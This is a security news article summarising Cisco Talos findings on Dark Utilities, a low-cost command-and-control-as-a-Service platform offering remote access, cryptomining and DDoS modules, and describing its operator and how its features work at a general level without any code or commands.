Cybercriminals can now use a new service called Dark Utilities to build up a command and control (C2) center for their malicious activities.
Dark Utilities was created in 2022 as a C2-as-a-Service platform. Many functions are available on the platform, including cryptomining, DDoS, and remote access capabilities. The platform has approximately 3,000 users for now. Still, its services are offered at a minimal cost, making it appealing to adversaries looking to carry out attacks without having to construct their own C2 servers. As a result, there will possibly be more malware variants in the future trying to use the platform to build C2.
How are These Services Provided?
Dark Utilities supports numerous architectures and does not require any special development resources. Cisco Talos observed, “efforts underway to expand OS and system architecture support.” They distribute payloads in code run on victim systems, allowing them to register with the service and create a C2 channel while doing so.
In their blog, Cisco Talos indicated: “We observed malware samples using this service in the wild to establish C2 communications channels and remote access capabilities on infected systems. We’ve observed malware targeted Windows and Linux systems leveraging Dark Utilities.”
Creation of the Dark Utilities
Dark Utilities is operated by its leading creator, Inplex-sys. They don’t appear to have a lengthy history on cybercriminal forums; instead, their activities are restricted to the Telegram and Discord channels, where Dark Utilities offers technical support for its customers. Inplex-sys was observed advertising on the Lapsus$ Telegram channel upon Dark Utilities’ creation.
The Functionality of the Dark Utilities Platform
For user authentication, the Dark Utilities platform uses Discord. A payload must be created and deployed on victim machines to register new bots with the service. The platform is compatible with several operating systems.
The platform generates a command string based on the operating system chosen, which threat actors generally put into PowerShell or Bash scripts to make it easier to retrieve and run the payload on victim systems. Additionally, the selected payload ensures persistence on the target system by generating a Registry key on Windows, a Crontab entry, or a Systemd service on Linux.
Below is an instance of a payload aimed at the Windows operating system.
The platform has introduced support for new architectures like ARM64 and ARMV71, targeting embedded devices like routers, phones, and internet-of-things (IoT) devices.
Dark Utilities provides complete C2 capabilities on the Tor network and the open internet. It hosts payloads in the decentralized network system for storing and distributing data known as Interplanetary File System (IPFS).
There is a “Manager” administration panel available on the platform. The panel contains numerous built-in modules that can be used to launch DDoS attacks, mine cryptocurrencies, and execute commands across systems under their control. It also shows the systems that the account has control over.
The platform has two built-in DDoS attack interfaces that each handle a variety of techniques. Layer 4 supports TCP, UDP, and ICMP in addition to a variety created especially for gaming platforms like Teamspeak3, Fivem, GMOD, and Valve, as well as certain video games like “Counter-Strike: Global Offensive” and “Among Us.” The GET, POST, HEAD, PATCH, PUT, DELETE, OPTIONS, and CONNECT methods are supported on Layer 7. The interface has forms for setting up Layer 4 and Layer 7 DDoS assaults, respectively, as seen below.
Additionally, the platform offers distributed command execution and a Discord grabber that can be used simultaneously against numerous systems.
When a compromised user account is used to establish an active C2 channel on an infected system, the attacker gains complete access to the machine. Within the admin panel, a PowerShell interactive prompt is available.
The platform’s documentation provides detailed instructions for performing reconnaissance, spotting vulnerabilities, and exploiting them to “infect servers” for use in a botnet, letting the hackers save time and resources while creating malware.
IOCs can be found in this Github repository.